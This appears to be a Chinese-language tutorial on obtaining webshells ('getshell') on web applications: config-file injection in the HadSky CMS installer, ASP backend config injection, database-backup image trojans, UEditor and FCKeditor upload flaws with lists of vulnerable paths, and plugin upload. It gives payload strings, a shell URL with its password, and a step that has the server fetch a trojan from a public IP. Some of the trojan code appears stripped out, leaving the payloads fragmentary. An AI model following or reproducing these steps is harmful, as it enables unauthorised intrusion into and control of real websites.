其他常见的getshell方式
ASP常用的一句话木马:
一、修改配置文件getshell
HadSky5.5.2.20180525存在配置文件写入导致getshell 安装过程总共五个步骤来进行安装,每一步程序将会引用一些文件进行操作,但是由于install.lock文件的存在我们并不能写入恶意代码到配置文件里,但是此cms安装程序是在case等于4的时候锁定程序,并且是通过GET方式获取的chkcode参数值为”HadSkyInstallComplete”的时候锁定程序的,这和之前写入配置文件的过程是分开的两个数据包,也就是会导致配置文件恶意写入问题
1.首先将upload文件放到网站根目录下。
2.然后进行安装
3.点击下一步即可 ,填写之后开启抓包
4.点击发送,这里只是第三步成功了,还没有完全成功
5.修改字段,然后点击发送
查看源码发现成功写入,payload:';phpinfo();//
想要getshell,将phpinfo();换成一句话木马即可
二、后台编辑getshell
由于网站设计有缺陷,后台编辑网站配置没有过滤并且能直接将编辑内容写入到可执行文件中导致了可以写入木马。
1.登录网站后台管理系统
2.网站的管理系统的话会存到数据库中
3.将一句话木马写入配置文件
payload:"%><%'
4.然后使用工具链接即可
http://192.168.44.147:81/Inc/Config.asp,连接密码:hack
三、数据库备份getshell
1.首先打开网站,进入后台
2.制作图片码,上传图片
3.接下来备份数据库getshell,选择数据库备份,输入当前数据库路径与备份后的名字
4.使用菜刀链接即可,注意写入的是asp的一句话木马
四、富文本编辑器getshell
常见的编辑器有Ueditor、fckeditor、CKEditor
Ueditor编辑器漏洞
- /ueditor/index.html
- /ueditor/asp/controller.asp?action=uploadimage
- /ueditor/asp/controller.asp?action=uploadfile
- /ueditor/net/controller.ashx?action=uploadimage
fckeditor编辑器漏洞
- FCKeditor/editor/filemanager/browser/default/connectors/test.html(2.4.3)
- FCKeditor/editor/filemanager/upload/test.html(2.4.3)
- FCKeditor/editor/filemanager/connectors/test.html
- FCKeditor/editor/filemanager/connectors/uploadtest.html
ueditor漏洞复现
1.访问漏洞链接查看是否存在漏洞
http://192.168.44.147:82/ueditor/net/controller.ashx?action=catchimage
2.创建攻击表单
shell addr:
3.制作图片码
4.把图片码放入到公网IP
5.访问第二步制作好的html文件,提交木马:把http://114.115.164.157:8555/444.png?.aspx,放到输入框中提交,正常页面返回木马路径。
6.使用工具连接木马
五、导入插件getshell
安装环境
进入后台之后上传插件压缩包
连接压缩包即可